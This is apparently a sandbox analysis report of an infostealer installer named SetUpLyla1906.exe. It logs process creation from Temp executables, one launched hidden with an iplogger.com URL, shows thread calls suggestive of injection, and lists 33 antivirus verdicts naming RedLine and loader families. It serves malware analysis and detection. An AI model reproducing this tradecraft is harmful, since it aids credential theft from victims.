CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\0KN0M747AQ6H7KK.exe track: 0 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\0KN0M747AQ6H7KK.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\H29C9C2NBN6AQI2.exe track: 0 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\H29C9C2NBN6AQI2.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 0 thread_handle: 0x00000000 process_identifier: 0 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe track: 0 command_line: filepath_r: C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe stack_pivoted: 0 creation_flags: 0 () inherit_handles: 0 process_handle: 0x00000000		0
CreateProcessInternalW June 21, 2023, 3:57 p.m.	thread_identifier: 2508 thread_handle: 0x00000128 process_identifier: 2504 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe track: 1 command_line: https://iplogger.com/12qaJ4 filepath_r: C:\Users\test22\AppData\Local\Temp\9B88LLG036LO2MA.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000001b4	1	1
NtResumeThread June 21, 2023, 3:50 p.m.	thread_handle: 0x00000000000000c4 suspend_count: 1 process_identifier: 2504	1	0
NtResumeThread June 21, 2023, 3:50 p.m.	thread_handle: 0x0000000000000138 suspend_count: 1 process_identifier: 2504	1	0
NtResumeThread June 21, 2023, 3:50 p.m.	thread_handle: 0x0000000000000178 suspend_count: 1 process_identifier: 2504	1	0
NtResumeThread June 21, 2023, 3:50 p.m.	thread_handle: 0x0000000000000554 suspend_count: 1 process_identifier: 2504	1	0
NtGetContextThread June 21, 2023, 3:50 p.m.	thread_handle: 0xfffffffffffffffe	1	0
NtGetContextThread June 21, 2023, 3:50 p.m.	thread_handle: 0xfffffffffffffffe	1	0
NtGetContextThread June 21, 2023, 3:50 p.m.	thread_handle: 0xfffffffffffffffe	1	0
NtGetContextThread June 21, 2023, 3:50 p.m.	thread_handle: 0xfffffffffffffffe	1	0

File has been identified by 33 AntiVirus engines on VirusTotal as malicious (33 events)

Bkav	W32.AIDetectMalware
Lionic	Trojan.Win32.Generic.4!c
Elastic	malicious (high confidence)
FireEye	Generic.mg.83ef65a424e1baf1
McAfee	Artemis!83EF65A424E1
Malwarebytes	Malware.AI.3513858617
Sangfor	Infostealer.Msil.Kryptik.Va4p
BitDefenderTheta	Gen:NN.ZemsilF.36250.!m0@aObpLqcG
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/GenKryptik.GKZJ
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	HEUR:Trojan-PSW.MSIL.Stealerc.gen
Avast	Win32:PWSX-gen [Trj]
Rising	Malware.Obfus/MSIL@AI.82 (RDM.MSIL2:Vow883etKodvFyamds2GwQ)
F-Secure	Trojan.TR/AD.Nekark.ghkex
McAfee-GW-Edition	BehavesLike.Win32.Trojan.fc
Sophos	Mal/Generic-S
SentinelOne	Static AI - Malicious PE
Webroot	W32.Trojan.RemLoader
Avira	TR/AD.Nekark.ghkex
Microsoft	Trojan:MSIL/RemLoader!MTB
Gridinsoft	Malware.Win32.RedLine.bot
ZoneAlarm	HEUR:Trojan-PSW.MSIL.Stealerc.gen
GData	Win32.Malware.Injector.R2M361
Acronis	suspicious
Cylance	unsafe
Panda	Trj/Chgt.AD
Ikarus	Win32.Outbreak
Fortinet	MSIL/Kryptik.AHIX!tr
AVG	Win32:PWSX-gen [Trj]
DeepInstinct	MALICIOUS
CrowdStrike	win/malicious_confidence_90% (W)

SetUpLyla1906.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All